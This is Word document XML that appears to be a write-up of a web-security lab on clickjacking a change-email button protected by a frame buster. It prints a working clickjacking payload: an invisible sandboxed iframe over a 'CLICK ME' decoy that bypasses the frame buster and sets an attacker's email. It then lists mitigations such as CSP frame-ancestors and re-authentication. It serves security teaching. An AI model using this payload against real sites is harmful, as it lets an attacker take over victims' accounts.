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02D5CEF9" w:rsidR="00973F43" w:rsidRPr="0045781B" w:rsidRDefault="0045781B" w:rsidP="0045781B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application possesses a vulnerability in its login functionality and a </w:t>
      </w:r>
      <w:r w:rsidR="00112F95">
        <w:t>change email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> button protected by a </w:t>
      </w:r>
      <w:r w:rsidR="00112F95">
        <w:t>frame buster which protects the website from being framed</w:t>
      </w:r>
      <w:r>
        <w:t>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2486F45D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</w:t>
      </w:r>
      <w:r w:rsidR="008B4C29">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the sandbox attribute that neutralizes the frame buster script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09A059A7" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679C0301" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C2510" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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396BFA4" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        width:1000px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6942AE79" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        height: 800px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2C4521" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        opacity: .1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4364CF6A" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        z-index: 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D75F9D7" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE68E7" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B1773" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">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C8F4CBA" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        top: 468px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F6406" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        left:65px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522CF5BF" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        z-index: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DC89BD" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        background-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>color</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: blue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249CD9F9" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3062F5C8" w14:textId="77777777" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BC8B4" w14:textId="05EB5B49" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;div&gt;CLICK ME&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF936F" w14:textId="685956C5" w:rsidR="008B4C29" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sandbox="allow-forms"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FE047" w14:textId="7857CE54" w:rsidR="00973F43" w:rsidRPr="0039752E" w:rsidRDefault="008B4C29" w:rsidP="008B4C29">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:t>src="https://0a49008d033875f6875773c200e50058.web-security-academy.net/my-account?email=hacassasker@attacker-website.com"&gt;&lt;/iframe&gt;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55943" w14:textId="2D682EC2" w:rsidR="00F54058" w:rsidRDefault="00F54058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144638CD" w14:textId="4BCBAD99" w:rsidR="00F54058" w:rsidRDefault="00F54058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058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CFA943" wp14:editId="3EB6A7BF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645910" cy="1252855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="13877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2BC15" w14:textId="77777777" w:rsidR="00F54058" w:rsidRDefault="00F54058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043EE4D" w14:textId="4411E6D3" w:rsidR="003249CD" w:rsidRPr="003249CD" w:rsidRDefault="003249CD" w:rsidP="0032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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Strengthen Frame Busting Techniques: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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">While the sandbox attribute can limit the actions of a framed content, attackers can still bypass many frame busters. Enhance the frame-busting script by combining multiple techniques. For instance, check if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003249CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>window.top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003249CD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3249CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003249CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>window.self</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003249CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> and if so, redirect or display an error. Additionally, use JavaScript to periodically check if the application is being framed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F065F" w14:textId="4A3F3D27" w:rsidR="003249CD" w:rsidRPr="003249CD" w:rsidRDefault="003249CD" w:rsidP="0032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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP) Enhancement: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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Strengthen the Content Security Policy (CSP) with the frame-ancestors directive to restrict which domains can embed the content. Even if an attacker bypasses the frame </w:t>
      </w:r>
      <w:r w:rsidRPr="003249CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>buster, the CSP can prevent framing attempts from unauthorized domains. This is essential since the scenario implies that the frame buster was neutralized by the sandbox attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E2CA90" w14:textId="12D281F3" w:rsidR="00047119" w:rsidRPr="003249CD" w:rsidRDefault="003249CD" w:rsidP="0032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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Require Strong User Interaction for Sensitive Changes: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49CD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Make changes to sensitive user information, like changing an email address, more interactive. Require multiple steps, re-authentication, or use 2-factor authentication. This ensures that even if a user is fooled into clicking a malicious overlay, the action isn't completed without additional, explicit user input specific to the application's genuine UI.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00047119" w:rsidRPr="003249CD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C75"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70EA6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1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="180284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047119"/>
    <w:rsid w:val="00112F95"/>
    <w:rsid w:val="002562EA"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003249CD"/>
    <w:rsid w:val="0039752E"/>
    <w:rsid w:val="0040394C"/>
    <w:rsid w:val="0045781B"/>
    <w:rsid w:val="00550BCF"/>
    <w:rsid w:val="005742C4"/>
    <w:rsid w:val="006D59C0"/>
    <w:rsid w:val="00725D7B"/>
    <w:rsid w:val="00825F83"/>
    <w:rsid w:val="008B4C29"/>
    <w:rsid w:val="00973F43"/>
    <w:rsid w:val="009871D8"/>
    <w:rsid w:val="00D87468"/>
    <w:rsid w:val="00E65A4E"/>
    <w:rsid w:val="00F5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2023-09-20T09:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>